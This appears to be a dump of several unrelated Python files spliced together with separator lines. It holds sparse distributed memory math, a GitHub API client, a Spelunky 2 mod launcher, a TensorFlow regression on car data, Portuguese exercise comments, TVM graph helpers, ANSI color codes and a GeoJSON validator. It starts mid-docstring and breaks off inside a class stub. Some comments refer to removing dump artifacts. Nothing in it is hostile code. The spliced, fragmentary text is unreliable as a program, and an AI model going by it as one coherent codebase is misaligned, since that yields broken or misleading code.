    V_n(r) = pi^(n/2) / Gamma(n/2 + 1) * r^n.
    BUG FIX: the original divided by Gamma((n+1)/2), which is the wrong
    argument (e.g. it gave 2*sqrt(pi) instead of pi for the unit disk, n=2).
    Safe to fix since nothing else calls this.
    """
    return (np.pi ** (n / 2)) / scipy.special.gamma(n / 2 + 1) * (r ** n)
def expected_intersection_lune(n, dvals, hamm_radius, r):
    # Gives the same results as the equation derived in the paper; this lune
    # form comes from the SDM book and runs a bit faster.
    """
    Computes the fraction of the space that exists in the circle intersection
    using the Lune equation.

    args::
    n = space dimension
    dvals = Hamm dist between circle centers
    hamm_radius = hamming distance radius each circle uses
    r = number of neurons; None reports fractions of the space instead of
        expected neuron counts

    returns::
    numpy array of floats, one intersection value per entry of dvals
    """
    # ensure all are ints:
    n = int(n)
    hamm_radius = int(hamm_radius)
    if r is not None:
        perc_addresses_w_neurons = int(r) / (2 ** n)
    else:
        perc_addresses_w_neurons = 1.0
    # size of a single Hamming circle: every point within hamm_radius flips
    area = 0
    for i in range(hamm_radius + 1):
        area += comb(n, i)
    out = []
    for d in dvals:
        d = int(d)
        # lune = region of one circle unreachable from the other; only the
        # odd-j terms contribute to the sum.
        lune = 0
        for j in range(1, d + 1, 2):
            half = (j - 1) / 2
            lune += comb(j - 1, half) * comb(n - j, hamm_radius - half)
        intersect = area - lune
        out.append(np.exp(np.log(intersect) + np.log(perc_addresses_w_neurons)))
    out = np.asarray(out)
    return np.nan_to_num(out, nan=0.0)
def expected_intersection_interpretable(n, dvals, hamm_radius, r, weight_type=None):
    """
    Expected circle-intersection size via the interpretable counting argument
    (cf. SDM_Interpretable), optionally weighting addresses by read/write overlap.

    args::
    n = space dimension
    dvals = Hamming distances between the two circle centers
    hamm_radius = Hamming radius of each circle
    r = number of neurons (None => r = 1.0)
    weight_type = None, "Linear" or "Expo". Any other value now raises
        ValueError; previously an unrecognized truthy value silently reused
        the weighting from a prior loop iteration (or raised NameError on the
        first one), producing wrong results.

    returns::
    numpy array with one expected-intersection value per entry of dvals
    """
    if r is None:
        r = 1.0
    # log(r / 2^n); n * log(2) avoids overflowing 2.0**n for large n.
    perc_addresses_w_neurons = np.log(float(r)) - n * np.log(2.0)
    res = []
    for dval in dvals:
        possible_addresses = 0
        for a in np.arange(n-hamm_radius-(dval//2), n+0.1-dval):
            # solve just for b then c is determined.
            bvals = np.arange(np.maximum(0, n-hamm_radius-a), dval-(n-hamm_radius-a)+0.1)  # +0.1 to ensure that the value here is represented.
            if len(bvals) == 0:
                continue
            if weight_type == "Linear":
                # linear weighting from the read and write operations.
                weighting = ((a+bvals)/n) * ((a+(dval-bvals))/n)
            elif weight_type == "Expo":
                # exponential weighting from the read and write operations.
                weighting = np.exp(-0.01*(n-(a+bvals))) * np.exp(-0.01*(n-(a+(dval-bvals))))
            elif not weight_type:
                weighting = 1
            else:
                raise ValueError("Unknown weight_type: %r" % (weight_type,))
            possible_addresses += comb(n-dval,a)*(weighting*comb(dval,bvals)).sum()
        expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
        res.append(np.exp(expected_intersect))
    return np.asarray(res)
def space_frac_to_hamm_radius(n, space_frac_rang):
    """Hamming radii whose circles cover given fractions of an n-dim space.

    args::
    - n = space dimension
    - space_frac_rang = list of space fractions to use

    returns::
    - list of Hamming distances (ints), one per requested fraction
    """
    # The binomial(n, 0.5) quantile function inverts the circle-area CDF.
    return [int(binom.ppf(space_frac, n, 0.5)) for space_frac in space_frac_rang]
def hamm_radius_to_space_frac(n, hamm_radius_rang):
    """Space fraction $p$ covered by a circle of each given Hamming radius.

    args::
    - n = space dimension
    - hamm_radius_rang = list of Hamming distances used

    returns::
    - list of p fractions (floats in [0, 1])
    """
    # CDF of Binomial(n, 0.5) = fraction of addresses within hd bit flips.
    return [binom.cdf(hd, n, 0.5) for hd in hamm_radius_rang]
def plot_line(x, y, label_prefix, label_val, norm=True):
    """Plot y against x on the current matplotlib axes.

    args::
    x, y = data to plot
    label_prefix = legend label prefix
    label_val = value appended to the prefix (pass None for no suffix)
    norm = normalize y to sum to 1 before plotting

    BUG FIX: the old truthiness check (`if label_val:`) silently dropped a
    legitimate label value of 0 (e.g. hamm_radius=0); use `is not None`.
    """
    label = label_prefix
    if label_val is not None:
        label += str(label_val)
    if norm:
        y = y / sum(y)
    plt.plot(x, y, label=label)
def label_plot(title, norm=True, directory="figures/Jaeckel_Analysis/", save_name=None):
    """Finish the current figure: legend, title, axis labels, optional save, show."""
    plt.legend()
    plt.title(title)
    plt.xlabel('Hamming Distance Between Pattern and Query')
    # Y axis label depends on whether the curves were normalized.
    ylabel = 'Normalized overlap weights' if norm else 'Expected neurons in intersection'
    plt.ylabel(ylabel)
    if save_name:
        plt.gcf().savefig(directory + save_name + '.png', dpi=250)
    plt.show()
def SDM_Interpretable(params, dvals, thresholds, title=None, label_prefix='ham='):
    """Same as the SDM lune equation in results. Equation was inspired by Jaeckel's SDM
    Hyperplane but applied to the SDM setting with binary vectors and optimized by working
    out lower and upper bounds to avoid using a CSP. This equation is much more
    interpretable than the Lune one used in the SDM Appendix B.
    See paper for the constraints and bounds explained.

    Plots one curve per threshold; returns the res array of the LAST threshold.
    """
    # log(r / 2^n); n * log(2) avoids overflowing 2.0**params.n for large n.
    perc_addresses_w_neurons = np.log(params.r) - params.n * np.log(2.0)
    for thresh in thresholds:
        res = []
        for dval in dvals:
            possible_addresses = 0
            for a in np.arange(params.n-thresh-(dval//2), params.n+0.1-dval):
                # solve just for b then c is determined.
                bvals = np.arange(np.maximum(0, params.n-thresh-a), dval-(params.n-thresh-a)+0.1)  # +0.1 to ensure that the value here is represented.
                if len(bvals) == 0:
                    continue
                possible_addresses += comb(params.n-dval,a)*comb(dval,bvals).sum()
            expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
            # BUG FIX: was np.exp(expexcted_intersect) -- a typo that raised
            # NameError the first time this function ran.
            res.append(np.exp(expected_intersect))
        res = np.asarray(res)
        plot_line(dvals, res, label_prefix, thresh, params.norm)
        if params.fit_beta_and_plot_attention:
            fit_beta_res, beta = fit_beta_regression(params.n, dvals, res)
            plot_line(dvals, fit_beta_res, 'fit_beta | '+label_prefix, thresh, params.norm)
    if title:  # else can call "label_plot" separately
        label_plot(title, params.norm)
    return res
def SDM_lune(params, dvals, title=None, label_prefix='ham='):
    """Exact SDM circle-intersection curve via the lune equation (SDM book,
    Appendix B; Kanerva, 1988). For some reason this is a slight upper bound on
    the book's tabulated results; the difference is negligible when norm=True."""
    intersection = expected_intersection_lune(params.n, dvals, params.hamm_radius, params.r)
    if params.plot_lines:
        plot_line(dvals, intersection, label_prefix, params.hamm_radius, params.norm)
    if params.fit_beta_and_plot_attention:
        # Overlay the best-fit Beta/attention curve for comparison.
        fit_beta_res, beta = fit_beta_regression(params.n, dvals, intersection)
        plot_line(dvals, fit_beta_res, 'fit_beta | ' + label_prefix, params.hamm_radius, params.norm)
    if title:  # else can call "label_plot" separately
        label_plot(title, params.norm)
    return intersection
def f(x, c_p):
    """Integrand of the SDM book's continuous approximation to the circle
    intersection (numerically integrated in expected_intersection_continuous).
    Less accurate than the exact equation outlined in the paper, which is used
    for all figures/analyses unless otherwise noted."""
    prefactor = 1 / (2 * np.pi * np.sqrt(x * (1 - x)))
    return prefactor * np.exp(-0.5 * (c_p ** 2 / (1 - x)))
def expected_intersection_continuous(n, dvals, hamm_radius, r, hard_mem_places):
    """
    Uses binary vector space with a continuous approximation from the SDM book
    that is inaccurate! Computes the fraction of the space in the circle
    intersection using the continuous approximation to the Lune equation.

    args::
    n = space dimension
    dvals = Hamm dist between circle centers
    hamm_radius = hamming distance radius each circle uses
    r = number of neurons
    hard_mem_places = turns the fraction of the space into the expected number
        of neurons that exist in this fraction

    returns::
    res = list of floats (fractions of the space, or neuron counts if
        hard_mem_places is on)
    """
    # c_p does not depend on dv -- hoisted out of the per-distance loop.
    c_p = (hamm_radius - (n / 2)) / np.sqrt(n / 4)
    res = []
    for dv in dvals:
        # args must be a tuple; the original passed (c_p), a parenthesized
        # scalar that scipy merely tolerates.
        intersect = quad(f, dv / n, 1, args=(c_p,))
        num = intersect[0]
        if hard_mem_places:
            num *= r
        res.append(num)
    return res
import json
import sys
from concurrent.futures import ThreadPoolExecutor, Future
from urllib3.connectionpool import HTTPSConnectionPool, HTTPResponse
from urllib3.exceptions import NewConnectionError, MaxRetryError, HTTPError
from typing import Dict, List, Any
from string import Template
class NetMod:
    """Singleton wrapper around a pooled HTTPS connection to the GitHub REST API.

    All requests share one blocking HTTPSConnectionPool, so at most
    __pool_size sockets are open at any time.
    """
    _instance = None
    __pool: HTTPSConnectionPool
    __pool_size: int = 5
    __api_base: str = 'api.github.com'
    __port: int = 443
    __timeout: float = 5.0
    # URL templates for the API routes this client knows about.
    __repo_route: Template = Template('/repos/$repo')
    __user_route: Template = Template('/users/$user')
    __org_route: Template = Template('/users/$user/orgs')
    """
    explicitly request v3 of the API
    https://docs.github.com/en/rest/overview/resources-in-the-rest-api#current-version
    """
    __headers: Dict[str, str] = {
        'Accept': 'application/vnd.github.v3+json',
        'User-Agent': 'Python-urllib/3',
        'Authorization': ''
    }
    """
    referenced from
    https://python-patterns.guide/gang-of-four/singleton/
    """
    def __new__(cls, *args, **kwargs):
        # Classic singleton: always hand back the one shared instance.
        if cls._instance is None:
            cls._instance = super(NetMod, cls).__new__(cls)
        return cls._instance
    def __init__(self):
        # NOTE(review): only __new__ is guarded, so __init__ re-runs (and the
        # pool is re-created) on every NetMod() call -- confirm that is intended.
        self.__pool = HTTPSConnectionPool(host=NetMod.__api_base, maxsize=NetMod.__pool_size, headers=NetMod.__headers,
                                          timeout=NetMod.__timeout, port=NetMod.__port, block=True)
    def __make_request(self, api_route: str, method: str = 'get') -> Dict[str, Any]:
        """Issue one request and return the decoded JSON body.

        Exits the process on connection failure or a non-200 response.
        """
        try:
            response: HTTPResponse = self.__pool.request(method, api_route, release_conn=True, redirect=True)
            res_data = json.loads(response.data)
            if response.status != 200:
                # GitHub error payloads carry a human-readable 'message'.
                raise HTTPError(response.status, res_data['message'])
            return res_data
        except (NewConnectionError, MaxRetryError):
            sys.exit("""Failed to connect. Exiting...""")
        except HTTPError as err:
            sys.exit(err)
    def fetch_repos_data(self, repos: List[str]) -> Dict[str, Any]:
        """Fetch /repos/<repo> for every entry concurrently; keyed by repo name."""
        api_routes = [self.__repo_route.substitute(repo=repo) for repo in repos]
        return self.__fetch_all__concurrent(repos, api_routes)
    def fetch_users_data(self, users: List[str]) -> Dict[str, Any]:
        """Fetch /users/<user> for every entry concurrently; keyed by username."""
        api_routes = [self.__user_route.substitute(user=user) for user in users]
        return self.__fetch_all__concurrent(users, api_routes)
    def fetch_org_data(self, user: str) -> Dict[str, Any]:
        """Fetch the organisations of a single user (synchronous)."""
        api_route = self.__org_route.substitute(user=user)
        return self.__make_request(api_route)
    def __fetch_all__concurrent(self, entries: List[str], api_routes: List[str]) -> Dict[str, Any]:
        """Issue all routes in parallel; map each entry to its decoded response.

        NOTE(review): max(len(entries), pool_size) spawns at least pool_size
        workers even for fewer entries; min() may have been intended -- confirm.
        """
        max_workers = max(len(entries), self.__pool_size)
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            res: Dict[str, Future[Dict[str, Any]]] = {entry: executor.submit(self.__make_request, route) for
                                                      entry, route in
                                                      zip(entries, api_routes)}
            return {user: data.result() for user, data in res.items()}
| nilq/baby-python | python |
import argparse
import logging
import sys
from pathlib import Path
import requests
from flask import Flask
from packaging import version
from .views.assets import blueprint as assets_blueprint
from .views.index import blueprint as index_blueprint
PROCESS_NAME = "Spel2.exe"  # default name of the game process
# Setup static files to work with onefile exe
BASE_DIR = Path(__file__).resolve().parent
APP_DIR = BASE_DIR
ROOT_DIR = BASE_DIR.parent.parent
if hasattr(sys, "_MEIPASS"):
    # Running from a PyInstaller bundle: static assets live in the unpacked
    # temp dir, and the "install dir" defaults to the exe's directory.
    # NOTE(review): sys._MEIPASS is an absolute path, so `BASE_DIR / ...`
    # discards BASE_DIR entirely (pathlib semantics) -- works, but confirm
    # that is the intent.
    BASE_DIR = BASE_DIR / getattr(sys, "_MEIPASS")
    APP_DIR = Path(sys.executable).resolve().parent
    ROOT_DIR = BASE_DIR
app = Flask(
    __name__,
    static_folder=f"{BASE_DIR / 'static'}",
    template_folder=f"{BASE_DIR / 'templates'}",
)
app.register_blueprint(index_blueprint)
app.register_blueprint(assets_blueprint, url_prefix="/assets")
def get_latest_version():
    """Return the newest modlunky2 release tag from GitHub, or None on any failure."""
    try:
        release = requests.get(
            "https://api.github.com/repos/spelunky-fyi/modlunky2/releases/latest"
        ).json()
        return version.parse(release["tag_name"])
    except Exception:  # pylint: disable=broad-except
        # Best effort only: offline / rate-limited lookups just yield None.
        return None
def get_current_version():
    """Parse the version string recorded in the bundled VERSION file."""
    version_path = ROOT_DIR / "VERSION"
    with version_path.open() as version_file:
        return version.parse(version_file.read().strip())
def main():
    """CLI entry point: parse arguments, configure the Flask app, and serve."""
    parser = argparse.ArgumentParser(description="Tool for modding Spelunky 2.")
    parser.add_argument(
        "--host", type=str, default="127.0.0.1", help="The host to listen on."
    )
    parser.add_argument("--port", type=int, default=8040, help="Port to listen on.")
    parser.add_argument("--debug", default=False, action="store_true")
    # (typo fix: the "(Default: ..." help strings were missing the closing paren)
    parser.add_argument(
        "--process-name",
        default=PROCESS_NAME,
        help="Name of Spelunky Process. (Default: %(default)s)",
    )
    parser.add_argument(
        "--install-dir",
        default=APP_DIR,
        help="Path to Spelunky 2 installation. (Default: %(default)s)",
    )
    args = parser.parse_args()
    log_format = "%(asctime)s: %(message)s"
    logging.basicConfig(format=log_format, level=logging.INFO, datefmt="%H:%M:%S")
    try:
        app.config.SPELUNKY_INSTALL_DIR = Path(args.install_dir)
        current = get_current_version()
        latest = get_latest_version()
        app.config.MODLUNKY_CURRENT_VERSION = current
        app.config.MODLUNKY_LATEST_VERSION = latest
        # BUG FIX: get_latest_version() returns None when the GitHub lookup
        # fails; `current < None` raised TypeError and aborted startup.
        # Treat "unknown latest version" as "no update needed".
        app.config.MODLUNKY_NEEDS_UPDATE = (
            latest is not None and current < latest
        )
        app.run(host=args.host, port=args.port, debug=args.debug)
    except Exception as err:  # pylint: disable=broad-except
        input(f"Failed to start ({err}). Press enter to exit... :(")
| nilq/baby-python | python |
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense
import numpy as np
import os
# We set seeds for reproducibility.
tf.random.set_seed(1)
np.random.seed(1)
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/autos/imports-85.data'
# Column names for the UCI "Automobile" (imports-85) dataset; the raw file
# has no header row. (Note: 'symbolying' is this file's spelling throughout.)
columns = ['symbolying','normalized-losses', 'make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', 'drive-wheels', 'engine-location'
           ,'wheel-base', 'length', 'width', 'height', 'curb-weight', 'engine-type', 'num-of-cylinders', 'engine-size', 'fuel-system'
           ,'bore', 'stroke', 'compression-ratio', 'horsepower', 'peak-rpm', 'city-mpg', 'highway-mpg', 'price']
# Load the dataset with pandas, mapping "?" placeholders to NA values.
raw_data = pd.read_csv(url,names=columns,na_values="?")
# We ignore the 'symboling' column.
raw_data.pop('symbolying')
# Drop all rows with missing values.
dataset = raw_data.dropna().copy()
# Min-max normalize every numeric feature column into [0, 1].
norm_data = dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]].copy()
norm_data_mins = norm_data.min()
norm_data_maxs = norm_data.max()
normalized_features =(norm_data-norm_data_mins)/(norm_data_maxs - norm_data_mins)
dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]] = normalized_features.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]]
# One-hot encode the categorical columns.
dataset = pd.get_dummies(dataset,columns=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
                         ,"engine-location","engine-type","fuel-system"],
                         prefix=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
                         ,"engine-location","engine-type","fuel-system"],prefix_sep='_')
# We set 80% of the available data for training and the rest for testing.
train_dataset = dataset.sample(frac = 0.8, random_state=1)
test_dataset = dataset.drop(train_dataset.index)
train_features = train_dataset.copy()
test_features = test_dataset.copy()
# The regression target: 'normalized-losses' (popped out of the features).
train_labels = train_features.pop('normalized-losses')
test_labels = test_features.pop('normalized-losses')
# Working with such a small dataset, it is better to train the model sample by
# sample for it to converge quickly. Note the labels are log-transformed here;
# predictions are exp'd back at evaluation time.
batch_size = 1
train_ds = tf.data.Dataset.from_tensor_slices((np.array(train_features),np.log(np.array(train_labels)))).batch(batch_size)
test_ds = tf.data.Dataset.from_tensor_slices((np.array(test_features),np.log(np.array(test_labels)))).batch(batch_size)
class Regression_Model(Model):
    """Fully-connected regression net: 64-32-16 ReLU layers and one linear output."""
    def __init__(self):
        super(Regression_Model, self).__init__()
        self.hidden1 = Dense(64, activation='relu')
        self.hidden2 = Dense(32, activation='relu')
        self.hidden3 = Dense(16, activation='relu')
        self.out_layer = Dense(1)
    def call(self, x):
        # Straight feed-forward pass through the three hidden layers.
        hidden = self.hidden1(x)
        hidden = self.hidden2(hidden)
        hidden = self.hidden3(hidden)
        return self.out_layer(hidden)
class Trainer:
    """Bundles the model, optimizer, loss and metrics; runs the train/test loops
    over the module-level train_ds/test_ds datasets."""
    def __init__(self):
        self.model:Regression_Model = Regression_Model()
        self.loss = self.get_loss()
        self.optimizer = self.get_optimizer("SGD")
        self.train_loss = tf.keras.metrics.Mean(name='train_loss')
        self.test_loss = tf.keras.metrics.Mean(name='test_loss')
    def get_optimizer(self, opt="adam"):
        """Return the optimizer named by `opt` ('adam' or 'SGD').

        Raises ValueError for unknown names. BUG FIX: the original did
        `raise "..."` with a bare string, which is itself a TypeError in
        Python 3 and never produced the intended message.
        """
        lr_schedule = tf.keras.optimizers.schedules.InverseTimeDecay(0.1, decay_steps=10000, decay_rate=1, staircase=False)
        if opt == 'adam':
            return tf.keras.optimizers.Adam(0.001)
        elif opt == 'SGD':
            return tf.keras.optimizers.SGD(lr_schedule)
        else:
            raise ValueError("This optimizer does not exist")
    def get_loss(self, loss='MSE'):
        """Return the loss function named by `loss` ('MSE' or 'MAE').

        Raises ValueError for unknown names (was `raise "error"`, a Python 3
        TypeError).
        """
        if loss == 'MSE':
            return tf.keras.losses.MSE
        elif loss == 'MAE':
            return tf.keras.losses.MAE
        else:
            raise ValueError("This loss does not exist")
    def predict(self, features):
        """Forward pass in inference mode."""
        return self.model.predict(features)
    @tf.function
    def train_step(self, features, values):
        """One gradient-descent step on a single batch."""
        with tf.GradientTape() as tape:
            predictions = self.model(features, training=True)
            loss = self.loss(values, predictions)
        gradients = tape.gradient(loss, self.model.trainable_variables)
        self.optimizer.apply_gradients(zip(gradients, self.model.trainable_variables))
        self.train_loss(loss)
    @tf.function
    def test_step(self, features, values):
        """Accumulate the loss on one evaluation batch (no weight updates)."""
        predictions = self.model(features, training=False)
        loss = self.loss(values, predictions)
        self.test_loss(loss)
    def train(self):
        """Run 100 epochs of training and per-epoch evaluation."""
        for epoch in range(100):
            # Reset the metric accumulators at the start of every epoch.
            self.train_loss.reset_states()
            self.test_loss.reset_states()
            for features, values in train_ds:
                self.train_step(features, values)
            for features, values in test_ds:
                self.test_step(features, values)
            print(
                f'Epoch {epoch + 1}, '
                f'Loss: {self.train_loss.result()}, '
                f'Test Loss: {self.test_loss.result()}, '
            )
# Reset the random seeds for reproducibility and start the training!
# (BUG FIX: removed a dataset-dump artifact that was fused onto the final
# plt.show() line and made the file unparseable.)
os.environ['PYTHONHASHSEED'] = str(1)
tf.random.set_seed(1)
np.random.seed(1)
trainer = Trainer()
trainer.train()
# Summary of the trained model.
trainer.model.summary()
# Evaluate on the held-out test set; predictions are exp'd because the model
# was trained on log-transformed labels.
predictions = np.exp(np.reshape(trainer.model.predict(np.array(test_features)), (np.shape(test_features)[0],)))
mse = (np.square(predictions - test_labels)).mean()
percentage = np.mean(np.abs(predictions - test_labels) / (test_labels))
print("mean squared error is {} and the percentage is {}".format(mse, percentage))
# The deep model achieved an MSE of ~226.68 (15.05 RMSE) and a ~9.35% error.
plt.plot(predictions)
plt.plot(np.array(test_labels))
plt.legend(labels = ["predictions","labels"])
plt.show()
# Aula 20 - 05-12-2019
# Analise de dados superficial
# Dica: Para este formulário será necessário usar um metodo para string novo.
# Vocês já conhecem o .strip() que remove os caracteres especiais \n do final
# da string. O .split(' ') que quebra a string em uma lista conforme o caractere
# que tem dentro das aspas.
# O método novo para este exercício é o .replace('{velho}','{novo}') - O velho
# é um caracter que queira substituir e o novo é o caracter que deseja incluir.
# Exemplo pelo shell do Python:
# >>> 'agua verde mar'.replace('a','A')
# 'AguA verde mAr'
# >>> 'agua verde mar'.replace('a','')
# 'gu verde mr'
# Como vemos, no primeiro exemplo o caracter "a" foi substituido pelo "A"
# e no segundo exemplo o "a" foi removido da string.
# Exercicio!
# Fazer usando funções
# O setor de Marketing da AMBEV criou uma pesquisa de mercado sobre gostos.
# https://forms.gle/PLuAZXpmpBvE1vkX7
# Para analisar os dados desta pesquisa, foi solicitado à HBSIS realizar
# a análise destes dados!
# O nome do arquivo é Formulário.csv
# Deste arquivo deverá sair os seguintes dados:
# Quantas pessoas gostam de cerveja?
# R:
# Quantas pessoas gostam de refrigerante?
# R:
# Quantas pessoas gostam de cerveja e refrigerante?
# R:
# Quantas pessoas participaram desta pesquisa?
# R:
# Qual a marca de cerveja que os participantes preferem?
# R:
# Quantos do sexo feminino gostam de bolacha?
# R:
# Quantas mulheres gostam de cerveja?
# R:
# Quantos menores de idade gostam de cerveja?
# R:
# Quantas mulheres gostam de beber cerveja e refrigerante?
# R:
| nilq/baby-python | python |
# pylint: disable=invalid-name
"""Utility function to get information from graph."""
from __future__ import absolute_import as _abs
import tvm
from . import graph_attr
def infer_shape(graph, **shape):
    """Infer input/output shapes given the shape of the inputs.

    Parameters
    ----------
    graph : Graph
        The graph to perform shape inference on.
    shape : dict of str to tuple
        The specific input shape.

    Returns
    -------
    in_shape : list of tuple
        Shape of inputs
    out_shape : list of tuple
        Shape of outputs
    """
    graph = graph_attr.set_shape_inputs(graph, shape)
    graph = graph.apply("InferShape")
    inferred = graph.json_attr("shape")
    idx = graph.index
    in_shapes = [inferred[idx.entry_id(name)] for name in idx.input_names]
    out_shapes = [inferred[idx.entry_id(entry)] for entry in idx.output_entries]
    return in_shapes, out_shapes
def infer_dtype(graph, **dtype):
    """Infer input/output dtypes given the types of the inputs.

    Parameters
    ----------
    graph : Graph
        The graph to perform type inference on.
    dtype : dict of str to dtype
        The specific input data type.

    Returns
    -------
    in_dtype : list of tuple
        Dtype of inputs
    out_dtype : list of tuple
        Dtype of outputs
    """
    graph = graph_attr.set_dtype_inputs(graph, dtype)
    graph = graph.apply("InferType")
    tcodes = graph.json_attr("dtype")
    idx = graph.index
    # Map the inferred integer type codes back to dtype strings.
    to_dtype = graph_attr.TCODE_TO_DTYPE
    in_dtypes = [to_dtype[tcodes[idx.entry_id(name)]] for name in idx.input_names]
    out_dtypes = [to_dtype[tcodes[idx.entry_id(entry)]] for entry in idx.output_entries]
    return in_dtypes, out_dtypes
# Handle to the C++-registered structural comparator; it returns an empty
# string when the graphs match, otherwise a description of the difference.
_deep_compare = tvm.get_global_func("nnvm.graph.DeepCompare")
def check_graph_equal(grapha, graphb, compare_variable_attrs=False):
    """Check that two graphs have equal structure.

    Parameters
    ----------
    grapha : Graph
        The first graph
    graphb : Graph
        The second graph
    compare_variable_attrs : bool, optional
        Whether to also compare attributes (names) on variables. Usually safe
        to skip unless input names must match exactly.

    Raises
    ------
    ValueError
        Raised with an explanatory message when the graphs are not equal.
    """
    message = _deep_compare(grapha, graphb, compare_variable_attrs)
    if message:
        raise ValueError("Graph compare error: " + message)
| nilq/baby-python | python |
# ANSI escape codes for colored / formatted terminal output.
# (BUG FIX: removed a dataset-dump artifact fused onto the END line that made
# the file unparseable.)
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
GRAY = '\033[90m'
WHITE = '\033[37m'
UNDERLINE = '\033[4m'
END = '\033[0m'  # resets all attributes
# -*- coding: utf-8 -*-
"""
.. module:: Backend.utils
:platform: Unix, Windows
.. moduleauthor:: Aki Mäkinen <aki.makinen@outlook.com>
"""
__author__ = 'Aki Mäkinen'
# Short-hand HTTP status codes used across the backend.
s_codes = {
    "OK": 200,
    "BAD": 400,
    "UNAUTH": 401,
    "FORBIDDEN": 403,
    "NOTFOUND": 404,
    "METHODNOTALLOWED": 405,
    "TEAPOT": 418,
    "INTERNALERROR": 500
}
# Validation schema for a single GeoJSON Feature (LBD JSON Formats document).
# Leaf entries are (example value of the required type, required?) tuples.
# Special keys drive the validator below: "_self_" describes the container
# itself, "_values_" whitelists allowed values, "_elements_" gives the list
# element type/schema, and "_elementcount_" pins the exact list length.
# (Python 2 code: unicode() is the expected string type.)
_geojson_feature_fields = {
    "type": {
        "_self_": (unicode(), True),
        "_values_": ["Feature"]
    },
    "geometry": {
        "_self_": (dict(), True),
        "type": {
            "_self_": (unicode(), True),
            "_values_": ["Point"]
        },
        "coordinates": {
            "_self_": (list(), True),
            "_elements_": float(),
            "_elementcount_": 2
        }
    },
    "properties": {
        "_self_": (dict(), True),
        "metadata": {
            "_self_": (dict(), False),
            "status": (unicode(), True),
            "info": (unicode(), True)
        }
    },
    "id": (unicode(), True)
}
# Schema for a GeoJSON FeatureCollection; "features" recursively reuses the
# Feature schema above for each element.
_geojson_featurecollection_fields = {
    "type": (unicode(), True), # Field key hard coded in validation
    "totalFeatures": (int(), False),
    "features": {
        "_self_": (list(), True),
        "_elements_": _geojson_feature_fields
    } # Field key hard coded in validation
}
def geo_json_scheme_validation(jsondict):
    """
    A simple GeoJSON validator.
    Uses the GeoJSON definitions described in LBD JSON Formats document.
    JSON format is described as python dictionary, where the key specifies the name of a JSON field and
    value describes if the field/value is required and what is the type of the value. There are some special
    key values: _self_ (if the value is list or embedded document), _elements_ (if the value is a list, this describes
    the element type) and _elementcount_ (restricts how many elements list can have).
    .. note::
        This function is a if-else hell... and the JSON format document is outdated.
    :param jsondict: GeoJSON formatted Python dictionary containing either GeoJSON Feature or FeatureCollection.
    :return Boolean: True or False depending on the result of the validation
    """
    if not isinstance(jsondict, dict):
        return False
    if "type" in jsondict:
        # Check that the given itemdict follows the given format.
        # Stops at the first error returning False
        def check_items(itemdict, itemformat):
            for key, value in itemformat.iteritems():
                # Tuple schema entry: (example value of expected type, required?)
                if isinstance(value, tuple):
                    if value[1] == True and key not in itemdict:
                        return False
                    elif key in itemdict:
                        if not isinstance(itemdict[key], type(value[0])):
                            return False
                    # Reject keys that match only case-insensitively.
                    elif key.lower() in [k.lower() for k in itemdict]:
                        return False
                    else:
                        pass
                # Dict schema entry: nested container described via "_self_".
                elif isinstance(value, dict):
                    if value["_self_"][1] == True and key not in itemdict:
                        return False
                    elif key in itemdict:
                        # The container is a list: validate length and elements.
                        if isinstance(value["_self_"][0], list):
                            if "_elementcount_" in value:
                                if not len(itemdict[key]) == value["_elementcount_"]:
                                    return False
                            # Elements described by a sub-schema: recurse per item.
                            if isinstance(value["_elements_"], dict):
                                itemlist = itemdict[key]
                                newitemformat = dict(value["_elements_"])
                                for item in itemlist:
                                    result = check_items(item, newitemformat)
                                    if not result:
                                        return False
                            else:
                                # Elements are plain values: check their type only.
                                for listitem in itemdict[key]:
                                    if not isinstance(listitem, type(value["_elements_"])):
                                        return False
                        # The container is an embedded document: recurse with
                        # the sub-schema (minus the "_self_" marker).
                        elif isinstance(value["_self_"][0], dict):
                            newitemdict = itemdict[key]
                            newitemformat = dict(value)
                            del newitemformat["_self_"]
                            result = check_items(newitemdict, newitemformat)
                            if not result:
                                return False
                        else:
                            # Scalar with optional "_values_" whitelist; the
                            # AttributeError fallback handles non-string values.
                            if isinstance(itemdict[key], type(value["_self_"][0])):
                                if "_values_" in value:
                                    try:
                                        if itemdict[key].lower() not in [v.lower() for v in value["_values_"]]:
                                            return False
                                    except AttributeError:
                                        if itemdict[key] not in value["_values_"]:
                                            return False
                            else:
                                return False
                    elif key in [k.lower() for k in itemdict]:
                        return False
                    else:
                        pass
                else:
                    return False
            return True
        # Dispatch on the GeoJSON "type" field (case-insensitive).
        if jsondict["type"].lower() == "featurecollection":
            result = check_items(jsondict, _geojson_featurecollection_fields)
        elif jsondict["type"].lower() == "feature":
            result = check_items(jsondict, _geojson_feature_fields)
        else:
            return False
    else:
        result = False
    return result
def flattener(dicti, parent):
    """Yield dotted key paths for every leaf of a nested dictionary.

    E.g. {"a": {"b": 1}, "c": 2} with parent=None yields "a.b" and "c".
    (Python 2 code: relies on dict.iteritems().)

    :param dicti: Dictionary to be flattened
    :param parent: Dotted prefix of the current subtree, or None at the root
    """
    for key, value in dicti.iteritems():
        # Build the dotted path for this key under the current prefix.
        path = key if parent is None else parent + "." + key
        if isinstance(value, dict):
            for leaf in flattener(value, path):
                yield leaf
        else:
            yield path
import logging
from common.DataSyncer import DataSyncer
from common.logger import initialize_logger
from models.User import User
# Module-level logger, configured through the project's shared helper.
logger = logging.getLogger(__name__)
initialize_logger(logger)
class UserPartialSyncer:
    """
    Sync only latest users info from API to db
    """
    def __init__(self):
